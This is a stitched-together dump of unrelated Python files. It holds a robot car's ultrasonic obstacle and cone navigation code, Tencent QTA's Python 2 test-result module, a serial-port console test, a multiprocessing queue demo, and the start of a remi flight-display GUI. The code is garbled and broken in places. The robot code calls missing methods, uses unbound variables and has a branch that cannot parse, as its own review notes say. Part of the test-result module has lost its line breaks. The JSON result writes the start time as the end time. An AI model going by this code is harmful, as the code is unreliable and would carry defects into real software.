        # NOTE(review): the method defined above is leitura(); leituras() does
        # not exist.  mA/mB/mC/mD below are locals of leitura and are unbound
        # here — this method cannot run as recovered.
        self.leituras()
        while (mA <= 180):
            # obstacle on the left
            # NOTE(review): angulo5 is assigned twice; 40 overwrites 35.
            angulo1 = 15;angulo2 = 20;angulo3 = 25;angulo4 = 30;angulo5 = 35;angulo5 = 40
            self.controle.posicionar(angulo1, 50)
            vel = motor.MudarVelocidade(40, 80)
            if (mA <= 150):
                self.controle.posicionar(angulo4, 50)
                vel = motor.MudarVelocidade(40, 80)  # slow down
            if (mB <= 180 and mC <= 180):
                # large object: dodge it
                # import the curve routines and call them here
                self.controle.posicionar(angulo3, 70)  # confirm angle and force
                vel = motor.MudarVelocidade(40, 80)  # slow down
                if (mB <= 150 and mC <= 150):
                    self.controle.posicionar(angulo5, 80)
                    vel = motor.MudarVelocidade(30, 80)  # slow down even more
            elif (mB <= 180):
                # smaller object: turn more slowly
                self.controle.posicionar(angulo2, 60)  # confirm angle and force
                vel = motor.MudarVelocidade(40, 80)
                if (mB <= 150):
                    self.controle.posicionar(angulo3, 50)
                    vel = motor.MudarVelocidade(30, 80)  # slow down
            if (mB > 180 and mC > 180):
                # obstacle no longer seen by centre-left and centre-right
                self.controle.posicionar(0, 50)
                vel = motor.MudarVelocidade(60, 80)
        while (mD <= 180):
            # repeat the rawA <= 180 logic: obstacle on the right
            angulo1 = -15;angulo2 = -20;angulo3 = -25;angulo4 = -30;angulo5 = -35
            self.controle.posicionar(angulo1, 50)
            vel = motor.MudarVelocidade(40, 80)
            if (mD <= 150):
                self.controle.posicionar(angulo4, 50)
                vel = motor.MudarVelocidade(30, 80)  # slow down
            if (mB <= 180 and mC <= 180):
                # large object: dodge it
                # import the curve routines and call them here
                self.controle.posicionar(angulo3, 70)  # confirm angle and force
                vel = motor.MudarVelocidade(40, 80)  # slow down
                if (mB <= 150 and mC <= 150):
                    self.controle.posicionar(angulo5, 80)
                    vel = motor.MudarVelocidade(30, 80)  # slow down even more
            elif (mB <= 180):
                # smaller object: turn more slowly
                self.controle.posicionar(angulo2, 60)  # confirm angle and force
                vel = motor.MudarVelocidade(40, 80)
                if (mB <= 150):
                    self.controle.posicionar(angulo3, 50)
                    vel = motor.MudarVelocidade(30, 80)  # slow down
            if (mB > 180 and mC > 180):
                # obstacle no longer seen by centre-left and centre-right
                self.controle.posicionar(0, 50)
                vel = motor.MudarVelocidade(60, 80)
        return mA, mB, mC, mD

    # This mode will be implemented in the control logic, not here.
    def callback(self):
        # NOTE(review): `a` is a module-level instance that only exists in the
        # commented-out usage example below, and navegacao() takes no
        # arguments — this call cannot succeed as recovered.
        print("Entramos em callback, regenerando navegacao")
        mA, mB, mC, mD = a.navegacao(5, 0.1)
        time.sleep(1/20)
        return mA, mB, mC, mD

    def localizacao(self):
        # NOTE(review): same leituras()/unbound-mA issues as navegacao().
        self.leituras()
        # If we reached this function, the vision system already confirmed it
        # is a cone and we are so close that vision is no longer reliable.
        # So we do the fine adjustments here, driving the motor and the servo.
        # After touching it we must sound the siren and put the H-bridge in
        # reverse, but how that is done is still to be defined.
        # Handle the cases of reliable readings on 2 sensors and on 1 sensor;
        # different logic for the left/right sensors vs the two centre ones.
        # With 1 sensor we turn faster so another detects; we can only align
        # properly once 2 sensors detect.
        dist_min = min([mA, mB, mC, mD])
        while (dist_min > 5):
            minimo = min([mA, mB, mC, mD])
            # -----------------------------
            # USE Y = 0.434X - 3.478
            # posicao = minimo * 0.434 - 3.478
            # servo.posicionar(posicao,50)  # choose the force
            # -----------------------------
            angulo1 = 5;angulo2 = 10;angulo3 = 15;angulo4 = 20;angulo5 = 30
            if minimo < 100:
                vel = motor.MudarVelocidade(30, 80)  # reduce speed 20%
                if minimo == mA:
                    while ((minimo != mB) or (minimo != mC)):
                        # cone closest to the left sensor
                        # NOTE(review): servo is an unbound name here.
                        servo.posicionar(angulo4, 50)
                        vel = motor.MudarVelocidade(15, 80)  # motor at 15%
                        #if minimo == mD:
                            #break
                        minimo = min([mA, mB, mC, mD])
                #elif minimo == mB:
                    # cone closest to centre-left
                    # servo.posicionar(angulo2, 50)  # motor at 20%
                elif minimo == mC or minimo == mB:
                    # NOTE(review): DiferentialBC is a local of leitura(),
                    # unbound here.
                    ServoAng = 0.22 * DiferentialBC
                    if (ServoAng >= 45):
                        ServoAng = 45
                    if (ServoAng <= -45):
                        ServoAng = -45
                    # cone closest to centre-right
                    #angulo1 = -15;angulo2 = -20;angulo3 = -25;angulo4 = -30;angulo5 = -35
                    servo.posicionar(ServoAng, 50)
                    vel = motor.MudarVelocidade(20, 80)  # motor at 20%
                    #if minimo == mA:
                    #    break
                    minimo = min([mA, mB, mC, mD])
            elif minimo < 50:
                # reduce speed 10% more; repeat the logic above turning harder
                # at the same motor speed
                # NOTE(review): rawA/rawB/rawC/rawD are unbound names.
                if minimo == rawA:
                    # cone closest to the left
                    self.posicionar(angulo3, 50)
                    vel = motor.MudarVelocidade(20, 80)  # motor at 5%
                elif minimo == rawB:
                    # cone closest to centre-left
                    self.posicionar(angulo1, 50)
                    vel = motor.MudarVelocidade(20, 80)  # motor at 10%
                elif minimo == rawC:
                    # cone closest to centre-right
                    self.posicionar(angulo1, 50)
                    vel = motor.MudarVelocidade(20, 80)  # motor at 10%
                elif minimo == rawD:
                    # cone closest to the right
                    self.posicionar(angulo3, 50)
                    vel = motor.MudarVelocidade(15, 80)  # motor at 5%
            elif minimo < 20:
                motor.StopMotor()
                # NOTE(review): sirene() is not defined in this file.
                sirene()
                # reduce speed 5% more; repeat the logic above turning harder
                # but at a slower motor speed
                # if minimo == rawA:  # cone closest to the left
                #     self.posicionar(angulo1, 30)  # motor at 10%
                # elif minimo == rawB:  # cone closest to centre-left
                #     self.posicionar(3, 20)  # motor at 15%
                #elif minimo == rawC:  # cone closest to centre-right
                #    self.posicionar(3, 20)  # motor at 15%
                # elif minimo == rawD:  # cone closest to the right
                #     self.posicionar(angulo1, 30)  # motor at 10%
                #elif minimo <= 8:
                    # siren
                    # reverse the motor and point the servo at the next cone
            dist_min = min([mA, mB, mC, mD])
        while (dist_min < 40):
            print("Entramos no modo de saida do cone")
            # NOTE(review): cone_um/cone_dois/cone_tres and tempo are unbound
            # names here (tempo exists only as self.tempo).
            if cone_um == True:
                while ((time.time() - tempo) < 3):
                    self.posicionar(-angulo5, 70)
                    motor.MarchaRe()
                    motor.MudarVelocidade(40, 50)
                motor.StopMotor()
                ### Resume with the vision system
                # while ((time.time() - tempo) < 3):
                #     self.posicionar(angulo5,70)
                #     motor.VelocidadePositiva()
                #     motor.MudarVelocidade(30, 80)
                #while ((time.time() - tempo) < 2):
                #    self.posicionar(0,20)
            elif cone_dois == True:
                while ((time.time() - tempo) < 5):
                    self.posicionar(0, 70)
                    motor.MarchaRe()
                    motor.MudarVelocidade(40, 90)
                motor.StopMotor()
                while ((time.time() - tempo) < 2):
                    self.posicionar(angulo5, 70)
                    motor.VelocidadePositiva()
                    motor.MudarVelocidade(60, 80)
                self.posicionar()
                ## Resume with the vision system
            elif cone_tres == True:
                # NOTE(review): this branch contains only comments in the
                # recovered source — a syntactically empty suite; a statement
                # (e.g. pass) is required for it to parse.
                # Only check with the vision system
                # reverse at 15% and take the exit angle toward the next cone
                ## except:
                ##     a.callback()  # something broke, re-entering navegacao
                ##     dist_min = min([metricB,metricC])
        return mA, mB, mC, mD

### Usage example
#a = Ultrassom(19,22,13,27)
#
#metricA,metricB = a.navegacao(1,0.005)
#
###a
##ultraA_read()
##def UltraDiferencial():
##    while (True):
##
##        Diferencial = Ue - Ud
##
##        print(Diferencial)
##readings = []
##readings.append(Process(target=ultraA_read))
##for reading in readings:
##    reading.start()
##    print(reading)
testresult.py
# -*- coding: utf-8 -*-
#
# Tencent is pleased to support the open source community by making QTA available.
# Copyright (C) 2016THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the BSD 3-Clause License (the "License"); you may not use this
# file except in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
#
'''Test result module.

Modeled after the design of the ``logging`` module.  Usage example::

    result = TestResult()
    result.add_handler(StreamResultHandler())
    result.begin_test()
    result.start_step('a step')
    result.info('test')
    result.end_test()

``result.info`` and friends accept an extra ``record`` dict, e.g.::

    result.error('', 'an error occurred', traceback=traceback.format_exc())

Like a logger, a TestResult object guarantees that all calls into every
ITestResultHandler are thread-safe.  A new handler can be added by
implementing ITestResultHandler; see that interface for details.
'''

# NOTE(review): this module targets Python 2 — it relies on the `unicode`
# type, the builtin `reduce`, and `int > None` comparisons.

import sys
import traceback
import time
import xml.dom.minidom as dom
import xml.parsers.expat as xmlexpat
import xml.sax.saxutils as saxutils
import socket
import threading
import codecs
import os
import locale
import json

from testbase import context
from testbase.util import _to_unicode, _to_utf8, get_thread_traceback, get_method_defined_class

os_encoding = locale.getdefaultlocale()[1]


class EnumLogLevel(object):
    '''Log levels.
    '''
    DEBUG = 10
    INFO = 20
    Environment = 21  # test-environment info: device/devices = devices used, machine = executing host
    ENVIRONMENT = Environment
    RESOURCE = 22
    WARNING = 30
    ERROR = 40
    ASSERT = 41  # assertion failure; carries actual/expect/code_location
    CRITICAL = 60
    APPCRASH = 61  # the application under test crashed
    TESTTIMEOUT = 62  # test execution timed out
    RESNOTREADY = 69  # current resources cannot satisfy the test's requirements


# Reverse map: numeric level -> level name.
levelname = {}
for name in EnumLogLevel.__dict__:
    value = EnumLogLevel.__dict__[name]
    if isinstance(value, int):
        levelname[value] = name


def _convert_timelength(sec):
    '''Convert a duration in seconds to an (hours, minutes, seconds) tuple.
    '''
    h = int(sec / 3600)
    sec -= h * 3600
    m = int(sec / 60)
    sec -= m * 60
    return (h, m, sec)


def _to_utf8_by_lines( s ):
    '''Convert an arbitrary string to UTF-8, line by line.
    '''
    lines = []
    for line in s.split('\n'):
        lines.append(_to_utf8(line))
    return '\n'.join(lines)


class TestResultBase(object):
    '''Base class for test results.

    Responsibilities:
      1. define the basic test-result interface
      2. guarantee thread safety
      3. decide whether the test passed or failed
    '''

    def __init__(self):
        '''Constructor.
        '''
        self.__lock = threading.RLock()
        self.__steps_passed = [True]  # pre-seed one step, in case the test case never calls startStep
        self.__curr_step = 0
        self.__accept_result = False
        self.__testcase = None
        self.__begin_time = None
        self.__end_time = None
        self.__error_level = None

    @property
    def testcase(self):
        '''the associated test case

        :returns: TestCase
        '''
        return self.__testcase

    @property
    def passed(self):
        '''whether the whole test passed

        :returns: True or False
        '''
        # NOTE(review): `reduce` is a builtin only on Python 2; Python 3
        # requires functools.reduce.
        return reduce(lambda x,y: x and y, self.__steps_passed)

    @property
    def failed_reason(self):
        '''the reason the test case failed

        :returns: str
        '''
        if self.__error_level:
            return levelname.get(self.__error_level, 'unknown')
        else:
            return ''

    @property
    def begin_time(self):
        '''start time of the test case

        :returns: float
        '''
        return self.__begin_time

    @property
    def end_time(self):
        '''end time of the test case

        :returns: float
        '''
        return self.__end_time

    def begin_test(self, testcase ):
        '''start executing a test case

        :param testcase: the test case
        :type testcase: TestCase
        '''
        with self.__lock:
            if self.__accept_result:
                raise RuntimeError("此时不可调用begin_test")
            self.__accept_result = True
            self.__begin_time = time.time()
            self.handle_test_begin(testcase)
            self.__testcase = testcase

    def end_test(self):
        '''finish executing the test case
        '''
        with self.__lock:
            if not self.__accept_result:
                raise RuntimeError("此时不可调用end_test")
            self.handle_step_end(self.__steps_passed[self.__curr_step])
            self.__end_time = time.time()
            self.handle_test_end(self.passed)  # guard against a case without any step
            self.__accept_result = False

    def begin_step(self, msg ):
        '''start a test step

        :param msg: name of the test step
        :type msg: string
        '''
        with self.__lock:
            if not self.__accept_result:
                raise RuntimeError("此时不可调用begin_step")
            # Close the previous step first (the pre-seeded step is skipped).
            if len(self.__steps_passed) != 1:
                self.handle_step_end(self.__steps_passed[self.__curr_step])
            self.__steps_passed.append(True)
            self.__curr_step += 1
            self.handle_step_begin(msg)

    def log_record(self, level, msg, record=None, attachments=None ):
        '''handle one log record

        :param level: log level, see EnumLogLevel
        :type level: string
        :param msg: log message
        :type msg: string
        :param record: log record
        :type record: dict
        :param attachments: attachments
        :type attachments: dict
        '''
        if record is None:
            record = {}
        if attachments is None:
            attachments = {}
        # NOTE(review): `unicode` only exists on Python 2.
        if not isinstance(msg,(str,unicode)):
            raise ValueError("msg必须是unicode或str类型")
        if isinstance(msg, unicode):
            msg = msg.encode('utf8')
        if level >= EnumLogLevel.ERROR:
            # Any ERROR-or-above record fails the current step and updates
            # the strongest error level seen so far.
            self.__steps_passed[self.__curr_step] = False
            # NOTE(review): int > None is only legal on Python 2.
            if level > self.__error_level:
                self.__error_level = level
            extra_record, extra_attachments = self._get_extra_fail_record_safe()
            record.update(extra_record)
            attachments.update(extra_attachments)
        with self.__lock:
            if not self.__accept_result:
                return
            self.handle_log_record(level, msg, record, attachments)

    def _get_extra_fail_record_safe(self,timeout=300):
        '''call the test case's get_extra_fail_record on a worker thread,
        bounded by *timeout* seconds so a hung hook cannot block the result.
        '''
        def _run(outputs, errors):
            try:
                outputs.append(context.current_testcase().get_extra_fail_record())
            except:
                errors.append(traceback.format_exc())

        errors = []
        outputs = []
        t = threading.Thread(target=_run, args=(outputs, errors))
        t.daemon = True
        t.start()
        t.join(timeout)
        extra_record, extra_attachments = {}, {}
        with self.__lock:
            if t.is_alive():
                stack=get_thread_traceback(t)
                self.handle_log_record(EnumLogLevel.ERROR, '测试失败时获取其他额外错误信息超过了指定时间:%ds' % timeout, {'traceback':stack}, {})
            else:
                if errors:
                    self.handle_log_record(EnumLogLevel.ERROR, '测试失败时获取其他额外错误信息失败', {'traceback':errors[0]}, {})
                else:
                    record_info = outputs[0]
                    if isinstance(record_info, (tuple,list)) and len(record_info) == 2:
                        extra_record, extra_attachments = record_info
                    else:
                        cls = get_method_defined_class(self.testcase.get_extra_fail_record)
                        if cls.__module__ == '__main__':
                            class_path = cls.__name__
                        else:
                            class_path = "%s.%s" % (cls.__module__,cls.__name__)
                        raise RuntimeError("%s.get_extra_fail_record must return a 2 elements tuple" % class_path)
        return extra_record, extra_attachments

    def debug(self, msg, record=None, attachments=None):
        '''log a DEBUG record
        '''
        self.log_record(EnumLogLevel.DEBUG, msg, record, attachments)

    def info(self, msg, record=None, attachments=None):
        '''log an INFO record
        '''
        self.log_record(EnumLogLevel.INFO, msg, record, attachments)

    def warning(self, msg, record=None, attachments=None):
        '''log a WARNING record
        '''
        self.log_record(EnumLogLevel.WARNING, msg, record, attachments)

    def error(self, msg, record=None, attachments=None):
        '''log an ERROR record
        '''
        self.log_record(EnumLogLevel.ERROR, msg, record, attachments)

    def exception(self, msg, record=None, attachments=None):
        '''log a CRITICAL record carrying the current traceback
        '''
        if record is None:
            record = {}
        record['traceback'] = traceback.format_exc()
        self.log_record(EnumLogLevel.CRITICAL, msg, record, attachments)

    def handle_test_begin(self, testcase ):
        '''hook: a test case starts executing

        :param testcase: the test case
        :type testcase: TestCase
        '''
        pass

    def handle_test_end(self, passed ):
        '''hook: a test case finished executing

        :param passed: whether the test case passed
        :type passed: boolean
        '''
        pass

    def handle_step_begin(self, msg ):
        '''hook: a test step starts

        :param msg: name of the test step
        :type msg: string
        '''
        pass

    def handle_step_end(self, passed ):
        '''hook: a test step ends

        :param passed: whether the test step passed
        :type passed: boolean
        '''
        pass

    def handle_log_record(self, level, msg, record, attachments ):
        '''hook: one log record

        :param level: log level, see EnumLogLevel
        :type level: string
        :param msg: log message
        :type msg: string
        :param record: log record
        :type record: dict
        :param attachments: attachments
        :type attachments: dict
        '''
        pass


class EmptyResult(TestResultBase):
    '''produces no output
    '''
    pass


class StreamResult(TestResultBase):
    '''writes the test result to a stream
    '''

    _seperator1 = "-" * 40 + "\n"
    _seperator2 = "=" * 60 + "\n"

    def __init__(self, stream=sys.stdout):
        '''Constructor.

        :param stream: stream object
        :type stream: file
        '''
        super(StreamResult, self).__init__()
        self._stream = stream
        if stream.encoding and stream.encoding != 'utf8':
            if stream.encoding.lower().startswith('ansi'):
                # fix: on Linux the encoding may be reported as ANSI*
                self._write = self._stream.write
            else:
self._write = lambda x: self._stream.write(x.decode('utf8').encode(stream.encoding)) else: self._write = self._stream.write self._step_results = [] def handle_test_begin(self, testcase ): '''处理一个测试用例执行的开始 :param testcase: 测试用例 :type testcase: TestCase ''' self._write(self._seperator2) owner = getattr(testcase, 'owner', None) priority = getattr(testcase, 'priority', None) timeout = getattr(testcase, 'timeout', None) self._write("测试用例:%s 所有者:%s 优先级:%s 超时:%s分钟\n" % (testcase.test_name, owner, priority, timeout)) self._write(self._seperator2) def handle_test_end(self, passed ): '''处理一个测试用例执行的结束 :param passed: 测试用例是否通过 :type passed: boolean ''' self._write(self._seperator2) self._write("测试用例开始时间: %s\n" % time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.begin_time))) self._write("测试用例结束时间: %s\n" % time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.end_time))) self._write("测试用例执行时间: %02d:%02d:%02.2f\n" % _convert_timelength(self.end_time - self.begin_time)) rsttxts = {True:'通过', False:'失败'} steptxt = '' for i, ipassed in enumerate(self._step_results): steptxt += " %s:%s" % (i+1, rsttxts[ipassed]) self._write("测试用例步骤结果: %s\n" % steptxt) self._write("测试用例最终结果: %s\n" % rsttxts[passed]) self._write(self._seperator2) def handle_step_begin(self, msg ): '''处理一个测试步骤的开始 :param msg: 测试步骤名称 :type msg: string ''' if not isinstance(msg,(str,unicode)): raise ValueError("msg必须是unicode或str类型") self._write(self._seperator1) self._write("步骤%s: %s\n" % (len(self._step_results) + 1, msg)) def handle_step_end(self, passed ): '''处理一个测试步骤的结束 :param passed: 测试步骤是否通过 :type passed: boolean ''' self._step_results.append(passed) def handle_log_record(self, level, msg, record, attachments ): '''处理一个日志记录 :param level: 日志级别,参考EnumLogLevel :type level: string :param msg: 日志消息 :type msg: string :param record: 日志记录 :type record: dict :param attachments: 附件 :type attachments: dict ''' self._write("%s: %s\n" % (levelname[level], msg)) if level == EnumLogLevel.ASSERT: if record.has_key("actual"): 
actual=record["actual"] self._write(" 实际值:%s%s\n" % (actual.__class__,actual)) if record.has_key("expect"): expect=record["expect"] self._write(" 期望值:%s%s\n" % (expect.__class__,expect)) if record.has_key("code_location"): self._write(_to_utf8(' File "%s", line %s, in %s\n' % record["code_location"])) if record.has_key("traceback"): self._write(_to_utf8_by_lines("%s\n" % record["traceback"])) for name in attachments: file_path = attachments[name] if os.path.exists(_to_unicode(file_path)): file_path = os.path.realpath(file_path) self._write(" %s:%s\n" % (name, _to_utf8(file_path))) class XmlResult(TestResultBase): '''xml格式的测试用例结果 ''' def __init__(self, file_path=None ): '''构造函数 :param file_path: XML文件路径 :type file_path: string ''' super(XmlResult, self).__init__() self._xmldoc = dom.Document() self._file_path = file_path @property def file_path(self): '''xml文件路径 :returns: str ''' return self._file_path def handle_test_begin(self, testcase ): '''处理一个测试用例执行的开始 :param testcase: 测试用例 :type testcase: TestCase ''' self._xmldoc.appendChild(self._xmldoc.createProcessingInstruction("xml-stylesheet", 'type="text/xsl" href="TestResult.xsl"')) owner = getattr(testcase, 'owner', None) priority = getattr(testcase, 'priority', None) timeout = getattr(testcase, 'timeout', None) self._testnode = self._xmldoc.createElement('TEST') self._testnode.setAttribute("name", _to_utf8(saxutils.escape(testcase.test_name))) self._testnode.setAttribute("owner", _to_utf8(saxutils.escape(str(owner)))) self._testnode.setAttribute("priority", str(priority)) self._testnode.setAttribute("timeout", str(timeout)) self._testnode.setAttribute('begintime', time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.begin_time))) self._xmldoc.appendChild(self._testnode) self.begin_step('测试用例初始步骤') def handle_test_end(self, passed ): '''处理一个测试用例执行的结束 :param passed: 测试用例是否通过 :type passed: boolean ''' self._testnode.setAttribute('result', str(passed)) self._testnode.setAttribute('endtime', time.strftime("%Y-%m-%d 
%H:%M:%S", time.localtime(self.end_time))) self._testnode.setAttribute('duration', "%02d:%02d:%02.2f\n" % _convert_timelength(self.end_time- self.begin_time)) if self._file_path: with codecs.open(self._file_path.decode('utf8'), 'w') as fd: fd.write(self.toxml()) def handle_step_begin(self, msg ): '''处理一个测试步骤的开始 :param msg: 测试步骤名称 :type msg: string ''' if not isinstance(msg, (str,unicode)): raise ValueError("msg必须是str或unicode类型") self._stepnode = self._xmldoc.createElement("STEP") self._stepnode.setAttribute('title', _to_utf8(msg)) self._stepnode.setAttribute('time', time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(time.time()))) self._testnode.appendChild(self._stepnode) def handle_step_end(self, passed ): '''处理一个测试步骤的结束 :param passed: 测试步骤是否通过 :type passed: boolean ''' self._stepnode.setAttribute('result', str(passed)) def handle_log_record(self, level, msg, record, attachments ): '''处理一个日志记录 :param level: 日志级别,参考EnumLogLevel :type level: string :param msg: 日志消息 :type msg: string :param record: 日志记录 :type record: dict :param attachments: 附件 :type attachments: dict ''' if not isinstance(msg, basestring): msg = str(msg) #由于目前的报告系统仅支持部分级别的标签,所以这里先做转换 if level >= EnumLogLevel.ERROR: tagname = levelname[EnumLogLevel.ERROR] elif level == EnumLogLevel.Environment or level == EnumLogLevel.RESOURCE: tagname = levelname[EnumLogLevel.INFO] else: tagname = levelname[level] infonode = self._xmldoc.createElement(tagname) textnode = self._xmldoc.createTextNode(_to_utf8(msg)) infonode.appendChild(textnode) self._stepnode.appendChild(infonode) if level == EnumLogLevel.ASSERT: if record.has_key("actual"): node = self._xmldoc.createElement("ACTUAL") try: actual=record["actual"] if isinstance(actual, basestring): dom.parseString("<a>%s</a>" % actual) acttxt = "%s%s" % (actual.__class__,actual) except xmlexpat.ExpatError: acttxt = "%s%s" % (actual.__class__,repr(actual)) except UnicodeEncodeError: acttxt = "%s%s" % (actual.__class__,repr(actual)) 
node.appendChild(self._xmldoc.createTextNode(acttxt)) infonode.appendChild(node) if record.has_key("expect"): node = self._xmldoc.createElement("EXPECT") try: expect=record["expect"] if isinstance(expect, basestring): dom.parseString("<a>%s</a>" % expect) exptxt = "%s%s" % (expect.__class__,expect) except xmlexpat.ExpatError: exptxt = "%s%s" % (expect.__class__,repr(expect)) except UnicodeEncodeError: exptxt = "%s%s" % (expect.__class__,repr(expect)) node.appendChild(self._xmldoc.createTextNode(exptxt)) infonode.appendChild(node) if record.has_key("traceback"): excnode = self._xmldoc.createElement('EXCEPT') excnode.appendChild(self._xmldoc.createTextNode(_to_utf8(record["traceback"]))) infonode.appendChild(excnode) for name in attachments: file_path = attachments[name] attnode = self._xmldoc.createElement('ATTACHMENT') attnode.setAttribute('filepath', _to_utf8(file_path)) attnode.appendChild(self._xmldoc.createTextNode(_to_utf8(name))) infonode.appendChild(attnode) def toxml(self): '''返回xml文本 :returns string - xml文本 ''' return self._xmldoc.toprettyxml(indent=" ", newl="\n") class JSONResult(TestResultBase): '''JSON格式的结果 ''' def __init__(self, testcase): super(JSONResult, self).__init__() self._steps = [] self._data = { "testcase": testcase.test_name, "description": testcase.test_doc, "owner": testcase.owner, "priority": testcase.priority, "status": testcase.status, "steps": self._steps } def get_data(self): return self._data def handle_test_begin(self, testcase ): '''处理一个测试用例执行的开始 :param testcase: 测试用例 :type testcase: TestCase ''' self.begin_step("测试用例初始化步骤") def handle_test_end(self, passed ): '''处理一个测试用例执行的结束 :param passed: 测试用例是否通过 :type passed: boolean ''' self._data["succeed"] = passed self._data["start_time"] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.begin_time)), self._data["end_time"] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.begin_time)), def handle_step_begin(self, msg ): '''处理一个测试步骤的开始 :param msg: 测试步骤名称 :type msg: string 
''' self._steps.append({ "name": msg, "start_time": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), "logs": [] }) def handle_step_end(self, passed ): '''处理一个测试步骤的结束 :param passed: 测试步骤是否通过 :type passed: boolean ''' curr_step = self._steps[-1] curr_step["succeed"] = passed curr_step["end_time"] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), def handle_log_record(self, level, msg, record, attachments ): '''处理一个日志记录 :param level: 日志级别,参考EnumLogLevel :type level: string :param msg: 日志消息 :type msg: string :param record: 日志记录 :type record: dict :param attachments: 附件 :type attachments: dict ''' print self._steps print level, msg, record, attachments curr_step = self._steps[-1] curr_step["logs"].append({ "timestamp": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), "level": level, "message": msg, "record": record, "attachments": attachments }) class TestResultCollection(list): '''测试结果集合 ''' def __init__(self, results, passed ): '''构造函数 :param results: 测试结果列表 :type results: list :param passed: 测试是否通过 :type passed: boolean ''' super(TestResultCollection, self).__init__(results) self.__passed = passed @property def passed(self): '''测试是否通过 :returns: boolean ''' return self.__passed from xml.dom import minidom
comunicationTest.py
import serial
import threading
from time import sleep

# Shared serial port instance used by both the reader thread and main().
serial_port = serial.Serial()


def read():
    """Continuously print any bytes arriving on the serial port."""
    while True:
        # Block (up to the port timeout) for at least one byte, then drain
        # whatever else is buffered.  This fixes the original busy-spin:
        # timeout=0 made read(9999999999) return immediately in a tight loop.
        data = serial_port.read(1)
        if data:
            data += serial_port.read(serial_port.in_waiting)
            print('Got:{}'.format(data))


def main():
    """Open the port, start the reader thread and forward typed input."""
    try:
        serial_port.baudrate = 9600
        serial_port.port = 'COM7'
        serial_port.timeout = 1  # seconds; lets read() wake up periodically
        if serial_port.is_open:  # .isOpen() is deprecated in pyserial 3.x
            serial_port.close()
        serial_port.open()
        # daemon=True so the endless reader loop cannot keep the process
        # alive after the user breaks out of the input loop below.
        t1 = threading.Thread(target=read, daemon=True)
        t1.start()
        while True:
            try:
                command = input()
                serial_port.write(bytearray(command, 'utf-8'))
            except (KeyboardInterrupt, EOFError):
                break
    except Exception as e:
        print(e)
    finally:
        # Always release the port -- the original close() was unreachable
        # on any exception path.
        if serial_port.is_open:
            serial_port.close()


if __name__ == "__main__":
    main()
033.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Inter-process communication demo: a producer and a consumer process
exchanging values through a shared multiprocessing.Queue.
'''
from multiprocessing import Process, Queue
import os, time, random


# Code run by the producer process:
def write(q):
    """Put 'A', 'B', 'C' on the queue, pausing a random moment after each."""
    print('Process to write: %s' % os.getpid())
    for item in ('A', 'B', 'C'):
        print('Put %s to queue...' % item)
        q.put(item)
        time.sleep(random.random())


# Code run by the consumer process:
def read(q):
    """Loop forever, printing every value taken off the queue."""
    print('Process to read: %s' % os.getpid())
    while True:
        print('Get %s from queue.' % q.get(True))


if __name__ == '__main__':
    # The parent creates the Queue and hands it to both children.
    q = Queue()
    writer = Process(target=write, args=(q,))
    reader = Process(target=read, args=(q,))
    # Launch the producer and the consumer.
    writer.start()
    reader.start()
    # Wait for the producer to finish...
    writer.join()
    # ...the consumer loops forever, so it must be terminated by force.
    reader.terminate()
PFD.py
# -*- coding: utf-8 -*- from remi import gui from remi import start, App import math import threading import time class AsciiContainer(gui.Container): widget_layout_map = None def __init__(self, *args, **kwargs): gui.Container.__init__(self, *args, **kwargs) self.css_position = 'relative' def set_from_asciiart(self, asciipattern, gap_horizontal=0, gap_vertical=0): """ asciipattern (str): a multiline string representing the layout | widget1 | | widget1 | | widget2 | widget3 | gap_horizontal (int): a percent value gap_vertical (int): a percent value """ pattern_rows = asciipattern.split('\n') # remove empty rows for r in pattern_rows[:]: if len(r.replace(" ", "")) < 1: pattern_rows.remove(r) layout_height_in_chars = len(pattern_rows) self.widget_layout_map = {} row_index = 0 for row in pattern_rows: row = row.strip() row_width = len(row) - row.count('|') #the row width is calculated without pipes row = row[1:-1] #removing |pipes at beginning and end columns = row.split('|') left_value = 0 for column in columns: widget_key = column.strip() widget_width = float(len(column)) if not widget_key in self.widget_layout_map.keys(): #width is calculated in percent # height is instead initialized at 1 and incremented by 1 each row the key is present # at the end of algorithm the height will be converted in percent self.widget_layout_map[widget_key] = { 'width': "%.2f%%"%float(widget_width / (row_width) * 100.0 - gap_horizontal), 'height':1, 'top':"%.2f%%"%float(row_index / (layout_height_in_chars) * 100.0 + (gap_vertical/2.0)), 'left':"%.2f%%"%float(left_value / (row_width) * 100.0 + (gap_horizontal/2.0))} else: self.widget_layout_map[widget_key]['height'] += 1 left_value += widget_width row_index += 1 #converting height values in percent string for key in self.widget_layout_map.keys(): self.widget_layout_map[key]['height'] = "%.2f%%"%float(self.widget_layout_map[key]['height'] / (layout_height_in_chars) * 100.0 - gap_vertical) for key in self.widget_layout_map.keys(): 
self.set_widget_layout(key) def append(self, widget, key=''): key = gui.Container.append(self, widget, key) self.set_widget_layout(key) return key def set_widget_layout(self, widget_key): if not ((widget_key in self.children.keys() and (widget_key in self.widget_layout_map.keys()))): return self.children[widget_key].css_position = 'absolute' self.children[widget_key].set_size(self.widget_layout_map[widget_key]['width'], self.widget_layout_map[widget_key]['height']) self.children[widget_key].css_left = self.widget_layout_map[widget_key]['left'] self.children[widget_key].css_top = self.widget_layout_map[widget_key]['top'] class SimpleVSI(gui.SvgGroup): value = 0 def __init__(self, x_pos, y_pos, wide, high, *args, **kwargs): """ x_pos and y_pos are coordinates indicated by the pointer, generally at the center of the shown tape """ gui.SvgGroup.__init__(self, *args, **kwargs) self.wide = wide self.high = high self.attributes['transform'] = 'translate(%s %s)'%(x_pos, y_pos) #it is used a subcontainer in order to show only a part of the entire tape self.subcontainer = gui.SvgSubcontainer(-self.wide, -self.high/2, wide, high) self.subcontainer.set_viewbox(-self.wide/2, -self.high/2, wide, self.high) self.append(self.subcontainer) 